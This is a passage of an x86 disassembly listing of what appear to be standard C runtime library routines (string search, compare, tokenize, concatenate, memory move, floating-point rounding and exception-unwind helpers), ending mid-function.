sub_41C990 proc near ; CODE XREF: sub_401ACD+412�p
; sub_401ACD+4B9�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
; FUNCTION CHUNK AT 0041C980 SIZE 00000005 BYTES
xor eax, eax
mov al, [esp+arg_4]
loc_41C996: ; CODE XREF: sub_41C2E0+6E�j
push ebx
mov ebx, eax
shl eax, 8
mov edx, [esp+4+arg_0]
test edx, 3
jz short loc_41C9BB
loc_41C9A8: ; CODE XREF: sub_41C990+29�j
mov cl, [edx]
inc edx
cmp cl, bl
jz short loc_41C980
test cl, cl
jz short loc_41CA04
test edx, 3
jnz short loc_41C9A8
loc_41C9BB: ; CODE XREF: sub_41C990+16�j
or ebx, eax
push edi
mov eax, ebx
shl ebx, 10h
push esi
or ebx, eax
loc_41C9C6: ; CODE XREF: sub_41C990+61�j
; sub_41C990+70�j ...
mov ecx, [edx]
mov edi, 7EFEFEFFh
mov eax, ecx
mov esi, edi
xor ecx, ebx
add esi, eax
add edi, ecx
xor ecx, 0FFFFFFFFh
xor eax, 0FFFFFFFFh
xor ecx, edi
xor eax, esi
add edx, 4
and ecx, 81010100h
jnz short loc_41CA08
and eax, 81010100h
jz short loc_41C9C6
and eax, 1010100h
jnz short loc_41CA02
and esi, 80000000h
jnz short loc_41C9C6
loc_41CA02: ; CODE XREF: sub_41C990+68�j
; sub_41C990+81�j ...
pop esi
pop edi
loc_41CA04: ; CODE XREF: sub_41C990+21�j
pop ebx
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_41CA08: ; CODE XREF: sub_41C990+5A�j
mov eax, [edx-4]
cmp al, bl
jz short loc_41CA45
test al, al
jz short loc_41CA02
cmp ah, bl
jz short loc_41CA3E
test ah, ah
jz short loc_41CA02
shr eax, 10h
cmp al, bl
jz short loc_41CA37
test al, al
jz short loc_41CA02
cmp ah, bl
jz short loc_41CA30
test ah, ah
jz short loc_41CA02
jmp short loc_41C9C6
; ---------------------------------------------------------------------------
loc_41CA30: ; CODE XREF: sub_41C990+98�j
pop esi
pop edi
lea eax, [edx-1]
pop ebx
retn
; ---------------------------------------------------------------------------
loc_41CA37: ; CODE XREF: sub_41C990+90�j
lea eax, [edx-2]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_41CA3E: ; CODE XREF: sub_41C990+85�j
lea eax, [edx-3]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_41CA45: ; CODE XREF: sub_41C990+7D�j
lea eax, [edx-4]
pop esi
pop edi
pop ebx
retn
sub_41C990 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_41CA50 proc near ; CODE XREF: sub_401ACD+1AE�p
; sub_401ACD+205�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_0]
mov ecx, [esp+arg_4]
test edx, 3
jnz short loc_41CA9C
loc_41CA60: ; CODE XREF: sub_41CA50+3C�j
; sub_41CA50+66�j ...
mov eax, [edx]
cmp al, [ecx]
jnz short loc_41CA94
or al, al
jz short loc_41CA90
cmp ah, [ecx+1]
jnz short loc_41CA94
or ah, ah
jz short loc_41CA90
shr eax, 10h
cmp al, [ecx+2]
jnz short loc_41CA94
or al, al
jz short loc_41CA90
cmp ah, [ecx+3]
jnz short loc_41CA94
add ecx, 4
add edx, 4
or ah, ah
jnz short loc_41CA60
mov edi, edi
loc_41CA90: ; CODE XREF: sub_41CA50+18�j
; sub_41CA50+21�j ...
xor eax, eax
retn
; ---------------------------------------------------------------------------
align 4
loc_41CA94: ; CODE XREF: sub_41CA50+14�j
; sub_41CA50+1D�j ...
sbb eax, eax
shl eax, 1
inc eax
retn
; ---------------------------------------------------------------------------
align 4
loc_41CA9C: ; CODE XREF: sub_41CA50+E�j
test edx, 1
jz short loc_41CAB8
mov al, [edx]
inc edx
cmp al, [ecx]
jnz short loc_41CA94
inc ecx
or al, al
jz short loc_41CA90
test edx, 2
jz short loc_41CA60
loc_41CAB8: ; CODE XREF: sub_41CA50+52�j
mov ax, [edx]
add edx, 2
cmp al, [ecx]
jnz short loc_41CA94
or al, al
jz short loc_41CA90
cmp ah, [ecx+1]
jnz short loc_41CA94
or ah, ah
jz short loc_41CA90
add ecx, 2
jmp short loc_41CA60
sub_41CA50 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CAD4 proc near ; CODE XREF: sub_401ACD+B5�p
; sub_401ACD+D5�p ...
var_20 = byte ptr -20h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 20h
push ebx
push esi
mov esi, [ebp+arg_4]
push edi
push 8
xor eax, eax
pop ecx
lea edi, [ebp+var_20]
rep stosd
push 7
pop edi
loc_41CAED: ; CODE XREF: sub_41CAD4+32�j
mov dl, [esi]
mov bl, 1
movzx ecx, dl
mov eax, ecx
and ecx, edi
shr eax, 3
shl bl, cl
lea eax, [ebp+eax+var_20]
or [eax], bl
inc esi
test dl, dl
jnz short loc_41CAED
mov edx, [ebp+arg_0]
test edx, edx
jnz short loc_41CB15
mov edx, dword_4DBE28
loc_41CB15: ; CODE XREF: sub_41CAD4+39�j
; sub_41CAD4+5F�j
mov al, [edx]
push 1
movzx esi, al
mov ecx, esi
pop ebx
and ecx, edi
shl ebx, cl
shr esi, 3
mov cl, [ebp+esi+var_20]
test bl, cl
jz short loc_41CB35
test al, al
jz short loc_41CB35
inc edx
jmp short loc_41CB15
; ---------------------------------------------------------------------------
loc_41CB35: ; CODE XREF: sub_41CAD4+58�j
; sub_41CAD4+5C�j
mov ebx, edx
loc_41CB37: ; CODE XREF: sub_41CAD4+81�j
mov al, [edx]
test al, al
jz short loc_41CB5B
movzx esi, al
mov ecx, esi
push 1
and ecx, edi
pop eax
shl eax, cl
shr esi, 3
mov cl, [ebp+esi+var_20]
test al, cl
jnz short loc_41CB57
inc edx
jmp short loc_41CB37
; ---------------------------------------------------------------------------
loc_41CB57: ; CODE XREF: sub_41CAD4+7E�j
and byte ptr [edx], 0
inc edx
loc_41CB5B: ; CODE XREF: sub_41CAD4+67�j
mov eax, ebx
pop edi
sub eax, edx
pop esi
neg eax
sbb eax, eax
mov dword_4DBE28, edx
and eax, ebx
pop ebx
leave
retn
sub_41CAD4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CB70 proc near ; CODE XREF: sub_409823+1C�p
; sub_415DAC+19�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_0]
push esi
push [ebp+arg_C]
mov [ebp+var_18], eax
mov [ebp+var_20], eax
mov eax, [ebp+arg_4]
push [ebp+arg_8]
mov [ebp+var_1C], eax
lea eax, [ebp+var_20]
mov [ebp+var_14], 42h
push eax
call sub_41FF3F
add esp, 0Ch
dec [ebp+var_1C]
mov esi, eax
js short loc_41CBAE
mov eax, [ebp+var_20]
and byte ptr [eax], 0
jmp short loc_41CBBB
; ---------------------------------------------------------------------------
loc_41CBAE: ; CODE XREF: sub_41CB70+34�j
lea eax, [ebp+var_20]
push eax
push 0
call sub_41FE2A
pop ecx
pop ecx
loc_41CBBB: ; CODE XREF: sub_41CB70+3C�j
mov eax, esi
pop esi
leave
retn
sub_41CB70 endp
; =============== S U B R O U T I N E =======================================
sub_41CBC0 proc near ; CODE XREF: sub_40ADE1+88�p
; sub_40B90E+60�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_8]
push edi
test ecx, ecx
jz loc_41CC74
mov edi, [esp+4+arg_0]
push esi
test edi, 3
push ebx
jz short loc_41CBEA
loc_41CBDB: ; CODE XREF: sub_41CBC0+28�j
mov al, [edi]
inc edi
test al, al
jz short loc_41CC1B
test edi, 3
jnz short loc_41CBDB
loc_41CBEA: ; CODE XREF: sub_41CBC0+19�j
; sub_41CBC0+40�j ...
mov eax, [edi]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add edi, 4
test eax, 81010100h
jz short loc_41CBEA
mov eax, [edi-4]
test al, al
jz short loc_41CC28
test ah, ah
jz short loc_41CC23
test eax, 0FF0000h
jz short loc_41CC1E
test eax, 0FF000000h
jnz short loc_41CBEA
loc_41CC1B: ; CODE XREF: sub_41CBC0+20�j
dec edi
jmp short loc_41CC2B
; ---------------------------------------------------------------------------
loc_41CC1E: ; CODE XREF: sub_41CBC0+52�j
sub edi, 2
jmp short loc_41CC2B
; ---------------------------------------------------------------------------
loc_41CC23: ; CODE XREF: sub_41CBC0+4B�j
sub edi, 3
jmp short loc_41CC2B
; ---------------------------------------------------------------------------
loc_41CC28: ; CODE XREF: sub_41CBC0+47�j
sub edi, 4
loc_41CC2B: ; CODE XREF: sub_41CBC0+5C�j
; sub_41CBC0+61�j ...
mov esi, [esp+0Ch+arg_4]
test esi, 3
jnz short loc_41CC40
mov ebx, ecx
shr ecx, 2
jnz short loc_41CC8C
jmp short loc_41CC5C
; ---------------------------------------------------------------------------
loc_41CC40: ; CODE XREF: sub_41CBC0+75�j
; sub_41CBC0+93�j
mov dl, [esi]
inc esi
test dl, dl
jz short loc_41CC7A
mov [edi], dl
inc edi
dec ecx
jz short loc_41CC70
test esi, 3
jnz short loc_41CC40
mov ebx, ecx
shr ecx, 2
jnz short loc_41CC8C
loc_41CC5C: ; CODE XREF: sub_41CBC0+7E�j
; sub_41CBC0+CA�j
mov ecx, ebx
and ecx, 3
jz short loc_41CC70
loc_41CC63: ; CODE XREF: sub_41CBC0+AE�j
mov dl, [esi]
inc esi
mov [edi], dl
inc edi
test dl, dl
jz short loc_41CC72
dec ecx
jnz short loc_41CC63
loc_41CC70: ; CODE XREF: sub_41CBC0+8B�j
; sub_41CBC0+A1�j
mov [edi], cl
loc_41CC72: ; CODE XREF: sub_41CBC0+AB�j
pop ebx
pop esi
loc_41CC74: ; CODE XREF: sub_41CBC0+7�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_41CC7A: ; CODE XREF: sub_41CBC0+85�j
; sub_41CBC0+E8�j
mov [edi], dl
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_41CC84: ; CODE XREF: sub_41CBC0+E4�j
; sub_41CBC0+FC�j
mov [edi], edx
add edi, 4
dec ecx
jz short loc_41CC5C
loc_41CC8C: ; CODE XREF: sub_41CBC0+7C�j
; sub_41CBC0+9A�j
mov edx, 7EFEFEFFh
mov eax, [esi]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [esi]
add esi, 4
test eax, 81010100h
jz short loc_41CC84
test dl, dl
jz short loc_41CC7A
test dh, dh
jz short loc_41CCD8
test edx, 0FF0000h
jz short loc_41CCC8
test edx, 0FF000000h
jnz short loc_41CC84
mov [edi], edx
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_41CCC8: ; CODE XREF: sub_41CBC0+F4�j
mov [edi], dx
xor edx, edx
mov eax, [esp+0Ch+arg_0]
mov [edi+2], dl
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_41CCD8: ; CODE XREF: sub_41CBC0+EC�j
mov [edi], dx
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
sub_41CBC0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CCE3 proc near ; CODE XREF: .text:0040B062�p
; sub_40C2AF+40�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_0]
mov [ebp+var_14], 49h
push eax
mov [ebp+var_18], eax
mov [ebp+var_20], eax
call sub_41B9C0
mov [ebp+var_1C], eax
lea eax, [ebp+arg_8]
push eax
lea eax, [ebp+var_20]
push [ebp+arg_4]
push eax
call sub_420DB0
add esp, 10h
leave
retn
sub_41CCE3 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CD20 proc near ; CODE XREF: sub_40B13C+62�p
; sub_40B13C+6F�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
mov esi, [ebp+arg_4]
mov ecx, [ebp+arg_8]
mov edi, [ebp+arg_0]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe short loc_41CD40
cmp edi, eax
jb loc_41CEB8
loc_41CD40: ; CODE XREF: sub_41CD20+16�j
test edi, 3
jnz short loc_41CD5C
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_41CD7C
rep movsd
jmp ds:off_41CE68[edx*4]
; ---------------------------------------------------------------------------
loc_41CD5C: ; CODE XREF: sub_41CD20+26�j
mov eax, edi
mov edx, 3
sub ecx, 4
jb short loc_41CD74
and eax, 3
add ecx, eax
jmp dword ptr ds:loc_41CD7C+4[eax*4]
; ---------------------------------------------------------------------------
loc_41CD74: ; CODE XREF: sub_41CD20+46�j
jmp dword ptr ds:loc_41CE78[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_41CD7C: ; CODE XREF: sub_41CD20+31�j
; sub_41CD20+8E�j ...
jmp ds:off_41CDFC[ecx*4]
; ---------------------------------------------------------------------------
db 2 dup(90h)
db 0CDh, 41h, 0
dd offset loc_41CDBC
dd offset loc_41CDE0
; ---------------------------------------------------------------------------
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
add esi, 3
add edi, 3
cmp ecx, 8
jb short loc_41CD7C
rep movsd
jmp ds:off_41CE68[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_41CDBC: ; DATA XREF: sub_41CD20+68�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
add esi, 2
add edi, 2
cmp ecx, 8
jb short loc_41CD7C
rep movsd
jmp ds:off_41CE68[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_41CDE0: ; DATA XREF: sub_41CD20+6C�o
and edx, ecx
mov al, [esi]
mov [edi], al
inc esi
shr ecx, 2
inc edi
cmp ecx, 8
jb short loc_41CD7C
rep movsd
jmp ds:off_41CE68[edx*4]
; ---------------------------------------------------------------------------
align 4
off_41CDFC dd offset loc_41CE5F ; DATA XREF: sub_41CD20:loc_41CD7C�r
dd offset loc_41CE4C
dd offset loc_41CE44
dd offset loc_41CE3C
dd offset loc_41CE34
dd offset loc_41CE2C
dd offset loc_41CE24
dd offset loc_41CE1C
; ---------------------------------------------------------------------------
loc_41CE1C: ; CODE XREF: sub_41CD20:loc_41CD7C�j
; DATA XREF: sub_41CD20+F8�o
mov eax, [esi+ecx*4-1Ch]
mov [edi+ecx*4-1Ch], eax
loc_41CE24: ; CODE XREF: sub_41CD20:loc_41CD7C�j
; DATA XREF: sub_41CD20+F4�o
mov eax, [esi+ecx*4-18h]
mov [edi+ecx*4-18h], eax
loc_41CE2C: ; CODE XREF: sub_41CD20:loc_41CD7C�j
; DATA XREF: sub_41CD20+F0�o
mov eax, [esi+ecx*4-14h]
mov [edi+ecx*4-14h], eax
loc_41CE34: ; CODE XREF: sub_41CD20:loc_41CD7C�j
; DATA XREF: sub_41CD20+EC�o
mov eax, [esi+ecx*4-10h]
mov [edi+ecx*4-10h], eax
loc_41CE3C: ; CODE XREF: sub_41CD20:loc_41CD7C�j
; DATA XREF: sub_41CD20+E8�o
mov eax, [esi+ecx*4-0Ch]
mov [edi+ecx*4-0Ch], eax
loc_41CE44: ; CODE XREF: sub_41CD20:loc_41CD7C�j
; DATA XREF: sub_41CD20+E4�o
mov eax, [esi+ecx*4-8]
mov [edi+ecx*4-8], eax
loc_41CE4C: ; CODE XREF: sub_41CD20:loc_41CD7C�j
; DATA XREF: sub_41CD20+E0�o
mov eax, [esi+ecx*4-4]
mov [edi+ecx*4-4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_41CE5F: ; CODE XREF: sub_41CD20:loc_41CD7C�j
; DATA XREF: sub_41CD20:off_41CDFC�o
jmp ds:off_41CE68[edx*4]
; ---------------------------------------------------------------------------
align 4
off_41CE68 dd offset loc_41CE78 ; DATA XREF: sub_41CD20+35�r
; sub_41CD20+92�r ...
dd offset loc_41CE80
dd offset loc_41CE8C
dd offset loc_41CEA0
; ---------------------------------------------------------------------------
loc_41CE78: ; CODE XREF: sub_41CD20+35�j
; sub_41CD20+92�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_41CE80: ; CODE XREF: sub_41CD20+35�j
; sub_41CD20+92�j ...
mov al, [esi]
mov [edi], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_41CE8C: ; CODE XREF: sub_41CD20+35�j
; sub_41CD20+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_41CEA0: ; CODE XREF: sub_41CD20+35�j
; sub_41CD20+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_41CEB8: ; CODE XREF: sub_41CD20+1A�j
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
test edi, 3
jnz short loc_41CEEC
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_41CEE0
std
rep movsd
cld
jmp ds:off_41D000[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_41CEE0: ; CODE XREF: sub_41CD20+1B1�j
; sub_41CD20+208�j ...
neg ecx
jmp ds:off_41CFB0[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_41CEEC: ; CODE XREF: sub_41CD20+1A6�j
mov eax, edi
mov edx, 3
cmp ecx, 4
jb short loc_41CF04
and eax, 3
sub ecx, eax
jmp dword ptr ds:loc_41CF04+4[eax*4]
; ---------------------------------------------------------------------------
loc_41CF04: ; CODE XREF: sub_41CD20+1D6�j
; DATA XREF: sub_41CD20+1DD�r
jmp ds:off_41D000[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_41CF17+1
; ---------------------------------------------------------------------------
cmp bh, cl
inc ecx
add [eax-31h], ah
inc ecx
loc_41CF17: ; DATA XREF: sub_41CD20+1EC�o
add [edx-2EDCFCBAh], cl
mov [edi+3], al
dec esi
shr ecx, 2
dec edi
cmp ecx, 8
jb short loc_41CEE0
std
rep movsd
cld
jmp ds:off_41D000[edx*4]
; ---------------------------------------------------------------------------
align 4
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
sub esi, 2
sub edi, 2
cmp ecx, 8
jb short loc_41CEE0
std
rep movsd
cld
jmp ds:off_41D000[edx*4]
; ---------------------------------------------------------------------------
align 10h
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
sub esi, 3
sub edi, 3
cmp ecx, 8
jb loc_41CEE0
std
rep movsd
cld
jmp ds:off_41D000[edx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_41CFB4
dd offset loc_41CFBC
dd offset loc_41CFC4
dd offset loc_41CFCC
dd offset loc_41CFD4
dd offset loc_41CFDC
dd offset loc_41CFE4
off_41CFB0 dd offset loc_41CFF7 ; DATA XREF: sub_41CD20+1C2�r
; ---------------------------------------------------------------------------
loc_41CFB4: ; DATA XREF: sub_41CD20+274�o
mov eax, [esi+ecx*4+1Ch]
mov [edi+ecx*4+1Ch], eax
loc_41CFBC: ; DATA XREF: sub_41CD20+278�o
mov eax, [esi+ecx*4+18h]
mov [edi+ecx*4+18h], eax
loc_41CFC4: ; DATA XREF: sub_41CD20+27C�o
mov eax, [esi+ecx*4+14h]
mov [edi+ecx*4+14h], eax
loc_41CFCC: ; DATA XREF: sub_41CD20+280�o
mov eax, [esi+ecx*4+10h]
mov [edi+ecx*4+10h], eax
loc_41CFD4: ; DATA XREF: sub_41CD20+284�o
mov eax, [esi+ecx*4+0Ch]
mov [edi+ecx*4+0Ch], eax
loc_41CFDC: ; DATA XREF: sub_41CD20+288�o
mov eax, [esi+ecx*4+8]
mov [edi+ecx*4+8], eax
loc_41CFE4: ; DATA XREF: sub_41CD20+28C�o
mov eax, [esi+ecx*4+4]
mov [edi+ecx*4+4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_41CFF7: ; CODE XREF: sub_41CD20+1C2�j
; DATA XREF: sub_41CD20:off_41CFB0�o
jmp ds:off_41D000[edx*4]
; ---------------------------------------------------------------------------
align 10h
off_41D000 dd offset loc_41D010 ; DATA XREF: sub_41CD20+1B7�r
; sub_41CD20:loc_41CF04�r ...
dd offset loc_41D018
dd offset loc_41D028
dd offset loc_41D03C
; ---------------------------------------------------------------------------
loc_41D010: ; CODE XREF: sub_41CD20+1B7�j
; sub_41CD20:loc_41CF04�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_41D018: ; CODE XREF: sub_41CD20+1B7�j
; sub_41CD20:loc_41CF04�j ...
mov al, [esi+3]
mov [edi+3], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_41D028: ; CODE XREF: sub_41CD20+1B7�j
; sub_41CD20:loc_41CF04�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_41D03C: ; CODE XREF: sub_41CD20+1B7�j
; sub_41CD20:loc_41CF04�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
sub_41CD20 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41D055(double)
sub_41D055 proc near ; CODE XREF: sub_40D2F4+38�p
var_24 = qword ptr -24h
var_18 = qword ptr -18h
var_8 = qword ptr -8
arg_0 = qword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
mov esi, 0FFFFh
push esi
push dword_43AE10
call sub_422089
fld [ebp+arg_0]
pop ecx
mov ebx, eax
mov eax, dword ptr [ebp+arg_0+6]
pop ecx
push ecx
and ax, 7FF0h
push ecx
cmp ax, 7FF0h
fstp [esp+18h+var_18]
jnz short loc_41D0DB
call sub_421F51
pop ecx
test eax, eax
pop ecx
jle short loc_41D0BE
cmp eax, 2
jle short loc_41D0B0
cmp eax, 3
jnz short loc_41D0BE
fld [ebp+arg_0]
push ebx
push ecx ; int
push ecx
fstp qword ptr [esp]
push 0Bh ; double
call sub_421861
add esp, 10h
jmp short loc_41D120
; ---------------------------------------------------------------------------
loc_41D0B0: ; CODE XREF: sub_41D055+3F�j
push esi
push ebx
call sub_422089
fld [ebp+arg_0]
pop ecx
pop ecx
jmp short loc_41D120
; ---------------------------------------------------------------------------
loc_41D0BE: ; CODE XREF: sub_41D055+3A�j
; sub_41D055+44�j
fld [ebp+arg_0]
fadd ds:dbl_4276F8
push ebx
push ecx ; double
push ecx
fstp qword ptr [esp]
fld [ebp+arg_0]
push ecx
push ecx
fstp [esp+24h+var_24]
push 0Bh
push 8
jmp short loc_41D118
; ---------------------------------------------------------------------------
loc_41D0DB: ; CODE XREF: sub_41D055+2F�j
call sub_421F16
fstp [ebp+var_8]
fld [ebp+var_8]
fcomp [ebp+arg_0]
pop ecx
pop ecx
fnstsw ax
sahf
jnz short loc_41D0FE
loc_41D0F0: ; CODE XREF: sub_41D055+AC�j
push esi
push ebx
call sub_422089
fld [ebp+var_8]
pop ecx
pop ecx
jmp short loc_41D120
; ---------------------------------------------------------------------------
loc_41D0FE: ; CODE XREF: sub_41D055+99�j
test bl, 20h
jnz short loc_41D0F0
fld [ebp+var_8]
push ebx ; int
push ecx
push ecx ; double
fstp qword ptr [esp]
fld [ebp+arg_0]
push ecx
push ecx ; double
fstp [esp+24h+var_24]
push 0Bh ; int
push 10h ; int
loc_41D118: ; CODE XREF: sub_41D055+84�j
call sub_4218B4
add esp, 1Ch
loc_41D120: ; CODE XREF: sub_41D055+59�j
; sub_41D055+67�j ...
pop esi
pop ebx
leave
retn
sub_41D055 endp
; =============== S U B R O U T I N E =======================================
sub_41D124 proc near ; CODE XREF: sub_41C164+9�p
; sub_422152+21�p
; DATA XREF: ...
call sub_41D13C
call sub_422152
mov dword_4DBE30, eax
call sub_422102
fnclex
retn
sub_41D124 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_2. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_41D13C proc near ; CODE XREF: sub_41D124�p
mov eax, offset sub_422540
mov off_43D424, offset sub_4221D5
mov off_43D420, eax
mov off_43D428, offset sub_42223B
mov off_43D42C, offset sub_42217B
mov off_43D430, offset sub_422223
mov off_43D434, eax
retn
sub_41D13C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D174 proc near ; CODE XREF: sub_40D2F4+1B�p
; sub_40D2F4+44�p ...
var_C = qword ptr -0Ch
var_4 = word ptr -4
var_2 = word ptr -2
push ebp
mov ebp, esp
add esp, 0FFFFFFF4h
fstcw [ebp+var_2]
wait
mov ax, [ebp+var_2]
or ah, 0Ch
mov [ebp+var_4], ax
fldcw [ebp+var_4]
fistp [ebp+var_C]
fldcw [ebp+var_2]
mov eax, dword ptr [ebp+var_C]
mov edx, dword ptr [ebp+var_C+4]
leave
retn
sub_41D174 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41D19B(double)
sub_41D19B proc near ; CODE XREF: sub_40D340+82�p
var_24 = qword ptr -24h
var_18 = qword ptr -18h
var_8 = qword ptr -8
arg_0 = qword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
mov esi, 0FFFFh
push esi
push dword_43AE28
call sub_422089
fld [ebp+arg_0]
pop ecx
mov ebx, eax
mov eax, dword ptr [ebp+arg_0+6]
pop ecx
push ecx
and ax, 7FF0h
push ecx
cmp ax, 7FF0h
fstp [esp+18h+var_18]
jnz short loc_41D221
call sub_421F51
pop ecx
test eax, eax
pop ecx
jle short loc_41D204
cmp eax, 2
jle short loc_41D1F6
cmp eax, 3
jnz short loc_41D204
fld [ebp+arg_0]
push ebx
push ecx ; int
push ecx
fstp qword ptr [esp]
push 0Ch ; double
call sub_421861
add esp, 10h
jmp short loc_41D266
; ---------------------------------------------------------------------------
loc_41D1F6: ; CODE XREF: sub_41D19B+3F�j
push esi
push ebx
call sub_422089
fld [ebp+arg_0]
pop ecx
pop ecx
jmp short loc_41D266
; ---------------------------------------------------------------------------
loc_41D204: ; CODE XREF: sub_41D19B+3A�j
; sub_41D19B+44�j
fld [ebp+arg_0]
fadd ds:dbl_4276F8
push ebx
push ecx ; double
push ecx
fstp qword ptr [esp]
fld [ebp+arg_0]
push ecx
push ecx
fstp [esp+24h+var_24]
push 0Ch
push 8
jmp short loc_41D25E
; ---------------------------------------------------------------------------
loc_41D221: ; CODE XREF: sub_41D19B+2F�j
call sub_421F16
fstp [ebp+var_8]
fld [ebp+var_8]
fcomp [ebp+arg_0]
pop ecx
pop ecx
fnstsw ax
sahf
jnz short loc_41D244
loc_41D236: ; CODE XREF: sub_41D19B+AC�j
push esi
push ebx
call sub_422089
fld [ebp+var_8]
pop ecx
pop ecx
jmp short loc_41D266
; ---------------------------------------------------------------------------
loc_41D244: ; CODE XREF: sub_41D19B+99�j
test bl, 20h
jnz short loc_41D236
fld [ebp+var_8]
push ebx ; int
push ecx
push ecx ; double
fstp qword ptr [esp]
fld [ebp+arg_0]
push ecx
push ecx ; double
fstp [esp+24h+var_24]
push 0Ch ; int
push 10h ; int
loc_41D25E: ; CODE XREF: sub_41D19B+84�j
call sub_4218B4
add esp, 1Ch
loc_41D266: ; CODE XREF: sub_41D19B+59�j
; sub_41D19B+67�j ...
pop esi
pop ebx
leave
retn
sub_41D19B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D26A proc near ; CODE XREF: sub_4229B1+71�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov eax, [ebp+arg_4]
add eax, 0Ch
mov [ebp+var_4], eax
mov ebx, large fs:0
mov eax, [ebx]
mov large fs:0, eax
mov eax, [ebp+arg_0]
mov ebx, [ebp+arg_4]
mov esp, [ebx-4]
mov ebp, [ebp+var_4]
jmp eax
sub_41D26A endp
; ---------------------------------------------------------------------------
pop edi
pop esi
pop ebx
leave
retn 8
; =============== S U B R O U T I N E =======================================
sub_41D29E proc near ; CODE XREF: sub_422B62+199�p
; sub_422D26+3E�p
arg_4 = dword ptr 8
pop eax
pop ecx
